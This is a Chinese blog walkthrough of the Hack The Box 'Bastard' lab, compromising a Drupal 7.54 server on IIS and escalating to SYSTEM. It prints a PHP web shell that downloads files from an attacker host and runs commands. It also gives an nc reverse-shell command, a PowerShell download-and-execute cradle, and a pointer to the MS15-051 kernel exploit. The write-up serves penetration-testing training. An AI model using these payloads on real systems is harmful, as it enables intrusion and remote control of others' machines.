HTB系列之七:Bastard

最新推荐文章于 2023-03-24 20:31:07 发布
最新推荐文章于 2023-03-24 20:31:07 发布
阅读量584 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/103535243
版权

这次挑战的是 HTB 的第7台靶机:Bastard

技能收获:

  • PHP Unserilaize

  • CMS Version Identify

  • Windows privilege escalation :Sherlock

信息收集

基本信息

Bastard IP:10.10.10.9

Kali IP:10.10.14.23

端口枚举

nmap -A -p- -v -T4 10.10.10.9

发现开启了80(IIS),访问之

看起来是drupal cms,访问 robots.txt ,发现版本变更文件

版本:Drupal 7.54

漏洞发现

searchsploit drupal 7.x

该版本存在 rce ,编辑 exploit

该exploit会攻击由服务扩展创建的REST端点,我们只需要找出REST端点的名称即可利用该漏洞。

通过目录枚举,我们发现 endpoint 为 /rest,用其替换exploit

gobuster -q dir --url http://10.10.10.9 -t 50 --wordlist ./word.txt

漏洞利用

php exp.php

没有反应,挂上 burpsuite 看看

设置 exp 的target为 burp 的监听端口

依然没回应,那应该是缺少php包,未成功发送

检查发现,Kali缺少 php-curl 包,安装好成功返回响应并写入 shell.php

apt install php-curl

利用 session.json 可以伪造会话,成功登录

已知目标是 x64 的系统,我们上传 nc.exe

下载地址:https://eternallybored.org/misc/netcat/

给 exp 添加一个文件上传功能,也可以使用 smb文件共享,使用 copy \\ip\nc64.exe nc.exe上传

 35 $phpmine = <<<'EOD'
 36 <?php
 37 if(isset($_GET['fupload'])){
 38  file_put_contents($_GET['fupload'],file_get_contents("http://10.10.14.15:8000/".$_GET['fupload']));
 39 };
 40 if(isset($_GET['fexec'])){
 41  echo "<pre>" . shell_exec($_GET['fexec']) . "</pre>";
 42 };
 43 ?>
 44 EOD;
 45 
 46 $file = [
 47     'filename' => 'cmd.php',
 48     'data' => $phpmine
 49 ];

10.10.10.9/233.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.15 4444

权限提升

git clone git clone https://github.com/rasta-mouse/Sherlock.git

Sherlock是一个在Windows下用于本地提权的PowerShell脚本

http://10.10.10.9/cmd.php?fexec=echo IEX(New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1') | powershell -noprofile -

提示 ms15-051 , 利用之

提权程序下载地址:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip

上传并运行

建立 nc 会话

至此完成

参考文章

Drupal 7.x RCE 漏洞分析 附EXP:

https://www.xctf.org.cn/library/details/58bd0f2c4d4c77aef7d15787cb65008a6533b87a/

Ms08067安全实验室

专注于普及网络安全知识。团队已出版《Web安全攻防:渗透测试实战指南》,2019年11月出版《内网安全攻防:渗透测试实战指南》目前在编Python渗透测试,JAVA代码审计和逆向工程等方面书籍。

团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。

官方网站:www.ms08067.com

Ms08067安全实验室
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB靶场系列Bastard
Ms08067安全实验室
07-28 219
点击星标,即时接收最新推文#01实验信息靶机:10.10.10.9Kali:10.10.16.2#02实验过程靶机打开的端口很少,接下来扫描端口的详细信息根据信息可以得出靶机是IIS搭建的,网站有robots.txt里面有很多可用信息接下来 再对靶机进行 常用漏洞脚本扫描 以及 常见UDP端口扫描,没有什么出现其他的可用信息那么这里的突破口就主要就是80端口通过刚刚nmap的扫描结果得出靶机用的是...
HTB-Bastard
TA不懒,但还没有添加简介
04-07 431
HTB-Bastard
oscp——HTB——Bastard
王嘟嘟的博客
05-20 543
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Webshell 这里访问之后看到是一个Drupal的站,Drupal的站在7.0可以直接直接getshell 使用脚本直接getshell 0x03 Webshell——Rootshell 传一个nc 上去然后反弹一个shell nc.exe -e cmd 10.10.14.6 1234 这里可以使用Sherlock先进行扫描。 powershell.exe -exec bypass -Command "& {Imp
Hack the box靶机 Bastard
菜浪马废的博客
06-03 289
修改几处地方 准备用nc连接
HTB-oscplike-Bastard+Granny
m0_53302733的博客
04-05 1103
HTB-oscplike-Bastard+Granny Bastard medium难度的bastard 靶机IP 10.10.10.9 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.9 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Win
htb21-reg:htb 2021注册引擎
05-20
HTB 7注册门户 什么? 这是一个允许compsoc委员会成员使用我们现有的google admin平台登录内部应用程序的工具。 为什么? 这使我们可以极大地减少启动新应用程序的开销,因为我们可以将帐户管理移交给长期受苦的...
HTB打靶日记:Stocker
01-15
在本文中,我们将深入探讨一个名为“Stocker”的Hack The Box (HTB)靶场案例,这是一次针对Web安全、Linux系统以及JavaScript的渗透测试练习。首先,我们从信息收集开始,这是任何渗透测试的第一步。 使用Nmap进行...
HTB打靶日记:Investigation
01-27
hackthebox
HTB打靶日记:Mentor
01-11
hackthebox
HTB打靶日记:BroScience
01-10
在本文中,我们将深入探讨一个名为“BroScience”的HackTheBox靶场机器的渗透测试过程。这个场景主要涉及Web安全、Linux系统以及多种攻击技术。首先,我们从信息收集开始,使用Nmap对目标IP(10.129.125.159)进行...
HtB撰写内容:修改内容-撰写内容
02-10
砍箱子-写东西 本部分适用于完成的所有机器,挑战和工作。
HTB-Querier靶场看内网渗透
Ms08067安全实验室
07-05 682
文章来源|MS08067 内网安全知识星球本文作者:阿青(Ms08067内网安全小组成员)querier作为htb中的一个靶标环境,其中涉及的⼀些基础知识和工具应用值得学习,对该靶标的渗透...
HTB----Heist(Hard)
Lcoinl的博客
11-28 732
HTB----Heist(Hard)
记一次对HTB靶场的渗透测试
MNK_xwf的博客
01-07 404
攻击地址:10.10.14.30 靶机地址:10.10.11.183 信息搜集阶段 利用nmap对靶机地址进行全端口扫描: 能看到目标地址开放了22,80,3000,3306端口,至于udp端口我也懒得扫,这种靶场没几个开放了的 用浏览器分别访问22,80,3000,3306端口结果只有3000端口开放,一看,是grafana系统 不过这个没怎么接触过,用searchsploit搜了一下 发现了一个任意文件读取漏洞刚好有对应的脚本我们直接下载 利用命令: python3 5058
新书预告 | 《内网安全攻防:渗透测试实战指南》(第二版)
Ms08067安全实验室
03-24 616
自2018年MS08067安全实验室出版《Web安全攻防:渗透测试实战指南》以来,陆续出版《内网安全攻防:渗透测试实战指南》、《Python安全攻防:渗透测试实战指南》、《JAVA代码审计-入门篇》等安全图书,超过百所院校用作授课教材,多本图书销量在京东、当当“计算机安全”细分领域中连续3年位居前十,期间合计加印28次,销量过10万本,并出版了繁体版本,并多次荣登2018年、2020年度计算机安全...
一文通读 敏感信息泄露
Ms08067安全实验室
09-22 899
0x01 等保测评项GBT 22239-2019《信息安全技术 网络安全等级保护基本要求》中,8.1.4.4安全计算环境—入侵防范项中要求包括:a)应遵循最小安装的原则,仅安装需要的组件和应用程序;b)应关闭不需要的系统服务、默认共享和高危端口;c)应通过设定终端接入方式或网络地址范围对通过网络进行管理的管理终端进行限制;d)应提供数据有效性检验功能,保证通过人机接口输入或通过通信接口输入的内容符...
HTB系列】Beep
Ms08067安全实验室
12-08 975
这次挑战的是 HTB 的第5台靶机:Beep,评分很高,难度中等靶机描述Beep 运行了大量的服务,这对正确发掘入口点有一定的挑战,由于存在大量的攻击向量,或许会让你不知所措,幸运地是,...
HTB系列】靶机Bitlab的渗透测试
Ms08067安全实验室
02-07 804
本文作者:是大方子(Ms08067实验室核心成员)﹀﹀﹀0x00 本文目录反思与总结基本信息渗透测试过程补充0x01 反思与总结1.curl发送GET参数化请求 2.对反弹回来的s...
[HTB]“Heist”靶机渗透详细思路
墨痕诉清风的博客
01-02 751
1.信息搜集2.寻找80端口信息泄漏的密码3.通过已知的用户枚举可能的用户名密码。4.寻找主机的其他用户5.5985端口的入侵以及拿shell6.找管理员操作进程,提取进程文件,拿到管理员密码,并拿shell。
format htb
最新发布
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值